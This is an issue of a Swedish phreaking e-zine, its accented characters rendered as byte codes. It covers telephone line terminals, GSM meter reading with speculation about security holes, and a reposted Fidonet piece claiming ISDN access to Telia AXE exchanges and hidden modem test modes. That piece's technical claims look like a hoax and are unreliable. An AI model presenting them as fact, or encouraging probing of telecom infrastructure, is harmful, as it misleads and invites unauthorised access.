LME Terminalen <20>r helorange och n<>stanlikdant byggda som den
svarta men lite mindre och att skruv plintarna sitter en bit
in i sj<73>lva terminalen, nackdelen blir d<> att man inte kan
kn<6B>ppa p<> krokodil kl<6B>mmor, men annars kan man ju andv<64>nda
n<>lar eller liknande (andv<64>nd kreativiteten)
Den oranga LME Terminalen kan sammankoppla som max 10 linor
och <20>r 9,3cm l<>ng, 1,7cm h<>g och 2cm bred. Hmm som jag sagt
heter ju terminalens synonym bet<65>ckning LME, hmm, LME <20>r ett
gammalt moder-bolag till Ericsson (LME=LM Ericsson) LM ericss-
<20>r ett gammalt telebolag som sysslade med v<>xlar och shit. Men
den vita LME terminalen <20>r relativt ny. Hur g<>r det ihop ?
-=o[ 3m ]o=-
3m Terminalen <20>r smart byggt, jag hittade faktiskt den i ett
l<>st k<>llarrum (en korridor p<> 200m) den satt fast i ett fett
magasin med en massa terminaler. Den sammankopplar som de fle-
sta max 10 linor, ocks<6B> storlek och skit: 7cm l<>ng, 2cm h<>g
och 17mm bred.
+-------------------------------------------------------------+
| GSM kan l<>sa av Elm<6C>tare [Knash] |
+-------------------------------------------------------------+
Tr<54>dl<64>s energiavl<76>sning via GSM-n<>tet. Med ny teknik kommer det
bli m<>jligt. Telias utvecklingsbolag Wireless Maingate AB ska
utveckla tekniken tillsammans med Enermet som <20>r ledande
leverant<6E>r av utrustning som avl<76>ser energif<69>rbrukning. Genom
att l<>sa av sina kunders elm<6C>tare via GSM kommer energif<69>retag-
en spara mycket tid och pengar. De slipper skicka ut en person
som ska g<>ra m<>tningarna. Enermet har sedan tidigare tecknat
ett avtal med Ericsson g<>llande GSM-terminaler f<>r energim<69>tar-
e. F<>r att kunna erbjuda en helhetsl<73>sning f<>r energiavl<76>sning
via GSM kr<6B>vdes en operat<61>r som kan hantera de nya krav p<>
kommunikationsl<73>sningar som den h<>r marknaden st<73>ller. MainGate
<20>r fokuserade p<> tj<74>nsteutveckling f<>r maskiner. Med MainGate
som samarbetspartner f<> vi tillg<6C>ng till en bred kompetens
inom telecom och IT, det tillsammans med Telias rikst<73>ckande
GSM-n<>t st<73>rker v<>ra m<>jligheter att lyckas, s<>ger Bengt
Sundling, VD p<> Enermet AB. Telia tror att marknaden f<>r
GSM-l<>sningar f<>r maskin till maskin kommer v<>xa. De ber<65>knar
att 30 procent av GSM-trafiken utg<74>ras av mobil data <20>r 2001.
Rippat fr<66>n: www.mkf.se/nyheter/
Detta kan ju betyda att lite roliga security holes bildas.
Kanske kommer det sitta SIM kort i elm<6C>taren, eller <20>nnu enkla-
re i sj<73>lva boxen.
+-------------------------------------------------------------+
| Cellul<75>r styrning, update [Knash] |
+-------------------------------------------------------------+
Ang<6E>enda artikeln "Promenad: Cellul<75>r styrning" i Outlaw-04 s<>
har jag(vi) studerat lite. Har hittat en artikel i "Veckans no-
tiser om Mobil" som du finner ovan. Boxen tyder starkt p<> att
det <20>r en elm<6C>tare. F<>r det f<>rsta s<> sitter ett fett m<>rke d<>r
det st<73>r "M<>tarsk<73>pet skall h<>llas l<>st" m<>tarsk<73>p (hmm, har
kanske n<>got med elm<6C>tare att g<>ra?) Sen s<> ser den i princip
ut likadan med siffor och dyl. Det sitter <20>ven en massa proppar
som i ett m<>tarsk<73>p d<>r elm<6C>taren brukar befinna sig.
+-------------------------------------------------------------+
| Lite rippat om AXE fr<66>n Fidonet [Knash] |
+-------------------------------------------------------------+
___________________________________________________
# Snabba <20>verf<72>ringar <20>ver det digitala telen<65>tet #
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Ins<6E>nd av H<>kan Andersson, 2:201/601
Av Bj<42>rn Felten, 2:203/208
Som ni f<>rmodligen k<>nner till, s<> kan Telias operat<61>rer logga
in p<> AXE- stationerna via fj<66>rranslutningar f<>r att utf<74>ra det
mesta som beh<65>vs. Detta sker via det digitala telen<65>tet, och
g<>r naturligtvis inte att g<>ra utifr<66>n de analoga inkopplingar-
na.
Men vad Telia kanske inte har t<>nkt p<>, <20>r att <20>ven vanliga ab-
onnenter med ISDN ligger ute p<> det digitala n<>tet. Det g<>r
s<>ledes utm<74>rkt att via ett vanligt ISDN-abonnemang fixa en hel
del roliga saker p<> AXE - stationen. Protokollet, som anv<6E>ndes
<20>r en helt vanlig Kermit, fast med reverserad CRC.
En av de roligare finesserna <20>r den, som anv<6E>ndes n<>r man
felanm<6E>ler ett abonnemang. D<> kopplar operat<61>ren, som tog emot
din felanm<6E>lan, om din AXE- station s<> att den ett kort <20>gonbl-
ick ger en helt digital anslutning hela v<>gen fram till alla
dina telefoner och modem. Detta f<>r att kunna utf<74>ra m<>tningar,
som inte <20>r m<>jliga via det analoga n<>tet. Du har helt enkelt
f<>tt en ISDN-lina under ett kort <20>gonblick! Detta kallas f<>r
ServiceIng<6E>ng till LinjeLyssnaren, eller SILL.
Detta, tillsammans med det servicel<65>ge som alla modem med V34
har, och som ibland yttrar sig <20>ven vid vanlig drift, genom att
modemet pl<70>tsligt b<>rjar l<>ta som ett flipperspel, som har
tiltat, ger intressanta
m<>jligheter. Servicel<65>get <20>r avsett f<>r att modemtillverkaren
skall kunna prova modemen snabbt och enkelt. Det g<>r (naturlig-
tvis) inte att komma in i detta l<>ge fr<66>n modemet sj<73>lvt, genom
n<>gon AT-kod, utan initieras genom en speciell sekvens under
handskakningens f<>rsta 500ms, och som genereras av den speciel-
la testutrustning, som tillverkaren har. Denna handskakningen
kommer f<>r <20>vrigt alltid f<>rst, s<> en s<>dan connect tar h<>gst
en halv sekund att etablera. Tyv<79>rr g<>r det inte att komma
ifr<66>n det fruktansv<73>rda oljudet, s<> detta <20>r ingenting f<>r den
som sover med basen under huvudkudden... :)
I detta servicel<65>ge g<>r modemet helt digitalt, och modulerar
allts<74> inte signalen f<>r transport <20>ver det analoga n<>tet, utan
det <20>r rena ettor och nollor som s<>ndes. Och detta med den max-
imal a hastighet, som modemets handskakning medger. I den
interna testloopen (enbart modemet) ligger det p<> kring 2M bps,
och i den externa <20>r det den anslutna serieporten, som s<>tter
gr<67>nsen. De flesta serieportar idag klarar 115k bps, men vissa
klarar <20>nda upp till 230k bps. Detta <20>r allts<74> den <20>verf<72>rings-
hastighet, som blir resultatet. Det senare motsvarar ungef<65>r
40000 cps eller en Mbyte p<> 25 sekunder...
Nu har jag <20>ntligen f<>tt klart mitt lilla hack, som fixar allt
detta fr<66>n ISDN-sidan. Det ringer allts<74> upp AXE-stationen, ko-
pplar om den till digitalt l<>ge <20>nda fram till valfritt V34-mo-
dem, <20>ppnar modemet i testl<74>get och skickar/ h<>mtar sedan filer
o.dyl. i den maximala
Rippat fr<66>n: Fidonet
+-------------------------------------------------------------+
| Teleutrustning som klarar <20>r2000 [Knash] |
+-------------------------------------------------------------+
On<4F>diga artiklar/textfiler finns <20>verallt. Varf<72>r inte f<>rst<73>r-
a och g<>ra dem fler. Nedan <20>r en lista p<> telefonv<6E>xlar och
lite teleutrustning som <20>r <20>r2000 kompatibla.
Rippat och klart !
PBX SOM KLARAR <20>R 2000
Leverant<6E>r (System) Produkt Kommentar
Alcatel (PBX) A4400, A4200E
Direcom Nitsuko NX64
Direcom Teleste 2000/2200
Doro (PBX) Doro AX-8, AX-8M, AX-32,
AX-32M,
Doro Trippel 10
Doro Median
Doro Link
Doro DX-E
Doro System Cordless
Doro System 2/24, 2/320
Doro Miniv<69>xel 1/4, 2/6,
Doro ISDN 2/8
Doro Index, Doro Index
DECT
COBS System 2000
Siemens Hicom 112, 118
Goldstar-Licencia GSX 208,
(PBX) GSX 408/816,
GSX 1224,
GSX 1832/3672/36112,
GHX 820,
GDK 162/186,
GDK 100,
GDK FP II
Nortel (PBX) Meridian R16,
Meridian R18,
Meridian R20,
Meridian R21,
Meridian R22,
Companion (Tr<54>dl<64>st)
Philips (PBX) Sophos-s50 ssw-640,
Sophos-s100 ssw-640,
Sophos-s250 ssw-640,
Sophos-s1000 ssw-640,
Sophos-s55, ssw-200,205
Sophos-s255,
ssw-200,205
Sophos-2500,ssw-700-730
Sophos-1025, ssw- 730
Telia (PBX) se lista p<>: www.telia.se
<20>verst p<> sidan
<20>vriga system som klarar <20>r 2000
Leverant<6E>r (System) Produkt Kommentar
Direcom
(Snabbtelefonv<6E>xel) ITT511
Ericsson
(Snabbtelefonv<6E>xel) ASE43X
Ericsson
(Snabbtelefonv<6E>xel) ASA10101
Ericsson, AsaCorn
(Snabbtelefonv<6E>xel) ASA10103
ASA10105
ASA10107
Goldstar-Licencia (CTI) PBX-link,
PBX popup,
PBX telecon.
Nortel ( ACD) Meridian Max rel. 8
Nortel (Samtalsdebitering) Meridian CCR rel. 6.03
Listan <20>r rippad fr<66>n: Landstingsf<73>rbundet
+-------------------------------------------------------------+
| Copyright [Knash] |
+-------------------------------------------------------------+
Jupp, copyright och inte copyfight faktiskt. Ni kan ju rippa
en artikel fr<66>n zinet och skriva k<>lla om ni snackat med mig om
det. Zinet f<>r spridas lite hit och dit s<> l<>nge det stannar
o<>ndrat.
+-------------------------------------------------------------+
| Prenumeration [Knash] |
+-------------------------------------------------------------+
-==- S-T-A-R-T-A P-R-E-N-U-M-E-R-A-T-I-O-N -==-
Skicka ett litet mail till keytrace@usa.net med Subscribe O-I
i subjekt f<>ltet.
-==- A-V-S-L-U-T-A P-R-E-N-U-M-E-R-A-T-I-O-N -==-
Skicka ett litet mail till keytrace@usa.net med Unsubscribe O-I
i subjekt f<>ltet.
+-------------------------------------------------------------+
| eX1t() |
+-------------------------------------------------------------+
___ . .
.' `. , . _/_ | ___ , _ /
| | | | | | / ` | | |
| | | | | | | | ` ^ '
`.__.' `._/| \__/ /\__ `.__/| \/ \/
I N F O R M A T I V A
Heretics Inc.
Ascii Development group.
editor cotact: knash@linux.nu